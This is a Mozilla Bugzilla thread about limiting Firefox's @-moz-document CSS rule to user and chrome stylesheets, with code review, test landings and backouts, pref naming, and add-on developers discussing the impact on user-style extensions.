Comment on attachment 8673080 [details] [diff] [review] Patch 3/2 v1b: candidate fix for addons Review of attachment 8673080 [details] [diff] [review]: ----------------------------------------------------------------- ::: layout/style/Loader.cpp @@ +329,5 @@ > bool aIsAlternate, > nsICSSLoaderObserver* aObserver, > nsIPrincipal* aLoaderPrincipal, > + nsINode* aRequestingNode, > + nsIDocument* aDocument) I know there are null checks for it, but can aRequestingNode actually be null? If it can't, do we need this extra argument, or will it always be the same as aRequestingNode->OwnerDoc()? @@ +358,5 @@ > + // chrome documents are parsed as user rather than author sheets; > + // in particular they are allowed to use @-moz-document. See bug 1201420. > + // > + // XXX Can GetDocumentURI() ever return NULL, and if so, which way should > + // the branch go? Per its comment in nsIDocument.h, it can, but that might just be for cases like document.implementation.createDocument(). I am not sure if a document with no documentURI will ever be in a position to load styles, but I'm thinking not upgrading mParsingMode to eUserSheetFeatures is the thing to do. @@ +359,5 @@ > + // in particular they are allowed to use @-moz-document. See bug 1201420. > + // > + // XXX Can GetDocumentURI() ever return NULL, and if so, which way should > + // the branch go? > + // XXX Should this be ->GetOriginalURI()? That definitely *does* return AFAIK the difference between GetDocumentURI() and GetOriginalURI() is just for pushState/popState. But a document's new URI must be the same origin as its original URI, so I think it won't matter which you use here.
Attachment #8673080 - Flags: feedback?(cam) → feedback+
Please also update the documentation in nsIStyleSheetService.idl to mention the new behaviour.
(In reply to Zack Weinberg (:zwol) from comment #57) > 2) I said in comment 47 that "I would appreciate assistance writing test > cases that would have caught this regression." I was insufficiently blunt. > *I need someone to write those test cases for me.* I do not have time to do > it myself even if I already knew how, which I don't. Don't we need to just test that @-moz-document rules apply when using loadAndRegisterSheet(..., AUTHOR_SHEET)? In which case you just need to tweak layout/style/test/chrome/test_moz_document_usability.html in your patch 2 to check this.
Flags: needinfo?(jason.barnabe)
Flags: needinfo?(garyshap)
(In reply to Cameron McCormack (:heycam) from comment #70) > (In reply to Zack Weinberg (:zwol) from comment #57) > > 2) I said in comment 47 that "I would appreciate assistance writing test > > cases that would have caught this regression." I was insufficiently blunt. > > *I need someone to write those test cases for me.* I do not have time to do > > it myself even if I already knew how, which I don't. > > Don't we need to just test that @-moz-document rules apply when using > loadAndRegisterSheet(..., AUTHOR_SHEET)? In which case you just need to > tweak layout/style/test/chrome/test_moz_document_usability.html in your > patch 2 to check this. We also need tests for <?xml-stylesheet?>, <link>, and <style> in chrome:// documents. That's what I don't know how to do -- specifically I don't know how to write a test that will execute from, or have access to, test-specific chrome:// resources.
I missed these queries some time ago... (In reply to Cameron McCormack (:heycam) from comment #68) > Comment on attachment 8673080 [details] [diff] [review] > Patch 3/2 v1b: candidate fix for addons > > Review of attachment 8673080 [details] [diff] [review]: > ----------------------------------------------------------------- > > ::: layout/style/Loader.cpp > @@ +329,5 @@ > > bool aIsAlternate, > > nsICSSLoaderObserver* aObserver, > > nsIPrincipal* aLoaderPrincipal, > > + nsINode* aRequestingNode, > > + nsIDocument* aDocument) > > I know there are null checks for it, but can aRequestingNode actually be > null? If it can't, do we need this extra argument, or will it always be the > same as aRequestingNode->OwnerDoc()? > > @@ +358,5 @@ > > + // chrome documents are parsed as user rather than author sheets; > > + // in particular they are allowed to use @-moz-document. See bug 1201420. > > + // > > + // XXX Can GetDocumentURI() ever return NULL, and if so, which way should > > + // the branch go? > > Per its comment in nsIDocument.h, it can, but that might just be for cases > like document.implementation.createDocument(). I am not sure if a document > with no documentURI will ever be in a position to load styles, but I'm > thinking not upgrading mParsingMode to eUserSheetFeatures is the thing to do. > > @@ +359,5 @@ > > + // in particular they are allowed to use @-moz-document. See bug 1201420. > > + // > > + // XXX Can GetDocumentURI() ever return NULL, and if so, which way should > > + // the branch go? > > + // XXX Should this be ->GetOriginalURI()? That definitely *does* return > > AFAIK the difference between GetDocumentURI() and GetOriginalURI() is just > for pushState/popState. But a document's new URI must be the same origin as > its original URI, so I think it won't matter which you use here. ... but I don't know the answers to any of them. This seems like Boris' department.
Flags: needinfo?(bzbarsky)
> but can aRequestingNode actually be null? Very generally, yes. For example, for @import from ua.css (or heck, for ua.css itself) it will be null. For the specific case of the constructor taking an nsIStyleSheetLinkingElement* argument, which is the one quoted in comment 68, I think.... I don't think it can be null. The three callers are LoadInlineStyle(), which has the <style> element, LoadStyleLink(), which has the <link> element or the document (for the case of Link HTTP headers), and PostLoadEvent which passes mDocument. But of course you don't need to pass this thing through at all, because you can use aLoader->GetDocument(), which will be non-null any time we have access to a document, right? > I am not sure if a document with no documentURI will ever be in a position to load > styles Load them enough to get this far? Unfortunately, yes. The check which will prevent any actual loading happens after this point. So in some sense it doesn't matter what parsing mode you use, since _parsing_ the sheet won't happen. I agree that using the most restrictive mode possible is good. > AFAIK the difference between GetDocumentURI() and GetOriginalURI() is just > for pushState/popState. Yes. I would use GetDocumentURI here.
Flags: needinfo?(bzbarsky)
This is going to break the code in the following popular StackOverflow answer, correct?: http://stackoverflow.com/a/17863685/3342739 (which is also referenced in http://getbootstrap.com/css/#callout-tables-responsive-ff-fieldset )
(In reply to Chris Rebert from comment #75) > This is going to break the code in the following popular StackOverflow > answer, correct?: > http://stackoverflow.com/a/17863685/3342739 > (which is also referenced in > http://getbootstrap.com/css/#callout-tables-responsive-ff-fieldset ) That is correct. Do you have time to dig through Bugzilla and figure out whether the <fieldset> problem that that is working around is already reported, and if not, file a new bug? Then we can make that block this (so the workaround will only stop working when it is no longer necessary). [N.B. I do not expect to have time to work on this or any other Firefox bugs for the foreseeable future.]
(In reply to Zack Weinberg (:zwol) from comment #76) > Do you have time to dig through Bugzilla and figure out whether the > <fieldset> problem that that is working around is already reported, and if > not, file a new bug? Then we can make that block this (so the workaround > will only stop working when it is no longer necessary). It's bug 504622.
Depends on: 504622
Updating the flag as per Comment 71.
Unfortunately, only the first patch in the series landed. This is decidedly *not* going to be fixed for FF44 the way things are going; I do not expect to have time to do it, anyway.
Target Milestone: mozilla43 → Future
Ugh, I misread the commits. Updating the site compat doc...
Resetting owner to default per Zack's request.
Assignee: zackw → nobody
Now that bug 504622 landed, I'm hoping we can reland this soon. I'll try to look into comment 72 sometime in the near future, although I'd also be quite happy if somebody else beats me to it.
I added a user css test in bug 1322634. It would be great if we could add some tests to ensure @-moz-document continue to work in user css.
(In reply to Masatoshi Kimura [:emk] from comment #83) > I added a user css test in bug 1322634. It would be great if we could add > some tests to ensure @-moz-document continue to work in user css. Well, I wrote a patch myself. Try run: https://treeherder.mozilla.org/#/jobs?repo=try&revision=314130c9e869ef4904c6345bb185b4bba42ead58
Attachment #8819487 - Flags: review?(cam)
Comment on attachment 8819487 [details] [diff] [review] Add a reftest to ensure @-moz-document works with user sheets Review of attachment 8819487 [details] [diff] [review]: ----------------------------------------------------------------- ::: layout/tools/reftest/chrome/userContent.css @@ +9,5 @@ > + .reftest-domain { > + background: lime !important; > + } > +} > +@-moz-document domain(mochi.test) { Is mochi.test a domain that doesn't match this test's URL? To avoid confusion (since some reftests do get run from mochi.test), can you use a domain that doesn't look like it might match, like example.invalid?
Attachment #8819487 - Flags: review?(cam) → review+
Pushed by VYV03354@nifty.ne.jp: https://hg.mozilla.org/integration/mozilla-inbound/rev/84ba5ac23266 Add a reftest to ensure @-moz-document works with user sheets. r=cam
Flags: needinfo?(VYV03354)
Backout by cbook@mozilla.com: https://hg.mozilla.org/integration/mozilla-inbound/rev/b9e8df505dd4 Backed out changeset 84ba5ac23266 for test failures in own test
> [task 2016-12-22T12:27:29.270446Z] 12:27:29 INFO - REFTEST TEST-UNEXPECTED-FAIL | http://10.0.2.2:8854/tests/layout/reftests/usercss/usercss.html == http://10.0.2.2:8854/tests/layout/reftests/usercss/usercss-ref.html | image comparison, max difference: 255, number of differing pixels: 16352 Oh, Android reftests are not loaded on file: URLs :(
Flags: needinfo?(VYV03354)
Pushed by VYV03354@nifty.ne.jp: https://hg.mozilla.org/integration/mozilla-inbound/rev/698b5719c9ee Add a reftest to ensure @-moz-document works with user sheets. r=cam
Patch for check-in, for the record. Android reftest looks good on try.
Attachment #8819487 - Attachment is obsolete: true
Comment on attachment 8932557 [details] Bug 1035091: Disable @-moz-document on author sheets on nightly and early beta. https://reviewboard.mozilla.org/r/203612/#review209522 I would prefer we keep these tests (by switching the perf on for them) at least until we actually unship it.
Attachment #8932557 - Flags: review?(xidorn+moz)
Comment on attachment 8932995 [details] Bug 1035091: Keep @-moz-document on late beta and later. https://reviewboard.mozilla.org/r/203992/#review209528 ::: modules/libpref/init/all.js:2840 (Diff revision 1) > // Should the :visited selector ever match (otherwise :link matches instead)? > pref("layout.css.visited_links_enabled", true); > > +// Pref to control whether @-moz-document rules are enabled in content pages. > +#ifdef EARLY_BETA_OR_EARLIER > +pref("layout.css.moz-document-hidden-from-content", true); Something like "layout.css.moz-document.content.enabled" might be better?
Attachment #8932995 - Flags: review?(xidorn+moz) → review+
Attachment #8932995 - Attachment is obsolete: true
(In reply to Xidorn Quan [:xidorn] UTC-6 (less responsive Nov 5 ~ Dec 16) from comment #98) > Comment on attachment 8932995 [details] > Bug 1035091: Keep @-moz-document on late beta and later. > > https://reviewboard.mozilla.org/r/203992/#review209528 > > ::: modules/libpref/init/all.js:2840 > (Diff revision 1) > > // Should the :visited selector ever match (otherwise :link matches instead)? > > pref("layout.css.visited_links_enabled", true); > > > > +// Pref to control whether @-moz-document rules are enabled in content pages. > > +#ifdef EARLY_BETA_OR_EARLIER > > +pref("layout.css.moz-document-hidden-from-content", true); > > Something like "layout.css.moz-document.content.enabled" might be better? Err, I read this too late. I can do the rename tomorrow if you insist :).
Comment on attachment 8932557 [details] Bug 1035091: Disable @-moz-document on author sheets on nightly and early beta. https://reviewboard.mozilla.org/r/203612/#review209554 ::: modules/libpref/init/all.js:2838 (Diff revision 3) > +// Pref to control whether @-moz-document rules are enabled in content pages. > +#ifdef EARLY_BETA_OR_EARLIER > +pref("layout.css.moz-document-hidden-from-content", true); > +#else > +pref("layout.css.moz-document-hidden-from-content", false); > +#endif I still think something like "layout.css.moz-document.content.enabled" would be better.
Attachment #8932557 - Flags: review?(xidorn+moz) → review+
Comment on attachment 8932557 [details] Bug 1035091: Disable @-moz-document on author sheets on nightly and early beta. https://reviewboard.mozilla.org/r/203612/#review209554 > I still think something like "layout.css.moz-document.content.enabled" would be better. Yup, renamed.
Pushed by ecoal95@gmail.com: https://hg.mozilla.org/integration/autoland/rev/37e0bd919af0 Disable @-moz-document on author sheets on nightly and early beta. r=xidorn
Pushed by ecoal95@gmail.com: https://hg.mozilla.org/integration/autoland/rev/b556432c990b Sort the reftest annotations for this bug. r=xidorn
Maybe we can close this bug and file a new bug for flipping the pref in release?
Blocks: 1422245
Yup, filed bug 1422245.
Status: REOPENED → RESOLVED
Closed: 9 years ago7 years ago
Resolution: --- → FIXED
Target Milestone: Future → mozilla59
Okay, so this landed on Nightly. What are the consequences for addons? More specifically, I have the case of Stylish-like addons in mind. Firstly, before the change, I was able to take a style with @-moz-document rules and parse it with this piece of code: var doc = document.implementation.createHTMLDocument(''); var style = doc.createElement('style'); style.textContent = '@-moz-document domain("plus.google.com") { body { background: #ffffee }}'; doc.head.appendChild(style); then loop through style.sheet.cssRules to see if any of them are instanceof CSSMozDocumentRule and, if so, extract conditions from them. (That is needed to apply the style to only relevant pages.) After the change, style.sheet.cssRules is empty. What is now the blessed way to parse a style and determine whether it applies to an URL? Secondly, userstyles (as in, the kind of styles that are applied through Stylish-like addons) are usually written under assumption that they will be applied as author sheets. That is because of CSS conflict resolution rules: For rules of equal specificity, non-!important user sheets lose to author sheets. The userstyle would have to either declare its rules !important, or artificially increase their specificity, in order to win over author sheets. Before the change, it was possible to inject styles using browser.tabs.insertCSS as author sheets. After the change, the style so injected behaves as if it contained no rules. To achieve the desired effect, I would have to parse the content of @-moz-document block, and inject only that. Do we (as in addon developers) have to implement our own CSS parsers or bring in third-party libraries as dependencies; or is there a way to use the browser’s CSS parser to parse a stylesheet containing @-moz-document rules?
How Stylish for Chrome deals with the lack of @-moz-document?
(In reply to Masatoshi Kimura [:emk] from comment #111) > How Stylish for Chrome deals with the lack of @-moz-document? Inelegantly. Instead of a single CSS source with site-specific rules enclosed in @-moz-document rules, it has to keep an equivalent JSON structure: { …various style metadata…, "sections": [ "urls": [], "urlPrefixes": [], "domains": ["mail.google.com"], "regexps": [], "code": "body { background: #c0ffee }\n/*multiple lines of CSS*/\n/*more lines*/" ] } It then builds a whole UI to let the user enter the code in a multiline editor and urls, urlPrefixes, domains, and regexps in a fiddly “[type combobox] [parameter input] [Add] [Remove]” multi-section form. One of the reasons to build my own extension over using Stylish or Stylus is to keep my CSS in plain text files (which I edit in Emacs and read over native messaging) and avoid the need for almost any UI. @-moz-document solves that need very well and I wasn’t seriously going to support Chrome anyway.
(In reply to Yuri Khan from comment #112) > (In reply to Masatoshi Kimura [:emk] from comment #111) > > How Stylish for Chrome deals with the lack of @-moz-document? > > Inelegantly. Well, you could argue about the elegance of walking the cssRules... But fair. You should be able to still support your use-case injecting the sheet as a user sheet, walking through them, and once you've determined which of them match, injecting them at the author level, right?
(In reply to Emilio Cobos Álvarez [:emilio] from comment #113) > Well, you could argue about the elegance of walking the cssRules... I could and I will. Using the CSS parser that comes with the browser to parse CSS, in a temporary empty document that the user never sees, and then walking the CSSOM objects resulted from that parsing, what could be a better idea? > You should be able to still support your use-case injecting the sheet > as a user sheet, walking through them, and once you've determined which of > them match, injecting them at the author level, right? No, not really. I can inject a style into a tab using browser.tabs.insertCSS. I can later uninject it using browser.tabs.removeCSS. These functions deal with the string in CSS syntax. I do not have any access to the DOM/CSSOM objects that result from this injection. Not from a background script, not from a content script. I would very much like, in addons, to have access to a CSS parser that actually parses the CSS that is fed into it and faithfully returns all of the results of that parsing. I am not particularly tied to the “create temporary document, create a style element in there”; that looked like a clever hack, too. A WebExt-exposed function that takes a string of CSS and returns an array of CSSRule would be just fine.
I think having an API like that makes a lot of sense. Filed bug 1422951 on that.
Keywords: site-compat
Depends on: 1424633
Depends on: 1426068
We never really documented the -moz- version separately, so I've documented this by adding a note to the @document page, and a note to the Fx59 rel notes: https://developer.mozilla.org/en-US/docs/Web/CSS/@document#Syntax https://developer.mozilla.org/en-US/Firefox/Releases/59#CSS Let me know if you think this is sufficient.
Depends on: 1435385
Whiteboard: [adv-main59-]
copy and paste with lost line-brake after fix.
Flags: needinfo?(emilio)
Please open a new bug for any regression due to this bug, please.
Assignee: nobody → emilio
Flags: needinfo?(emilio)
Depends on: 1446442
Blocks: 1446470
No longer blocks: 1446470
Depends on: 1446470
Depends on: 1449682
Blocks: 1449753
Depends on: 1462680
No longer depends on: 1462680
FWIW this is in release already, with the gotcha of bug 1446470, which allows those to work.
Blocks: 1520078
No longer blocks: 1520078
Depends on: 1536143
Regressions: 1615623
No longer depends on: 1446442
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: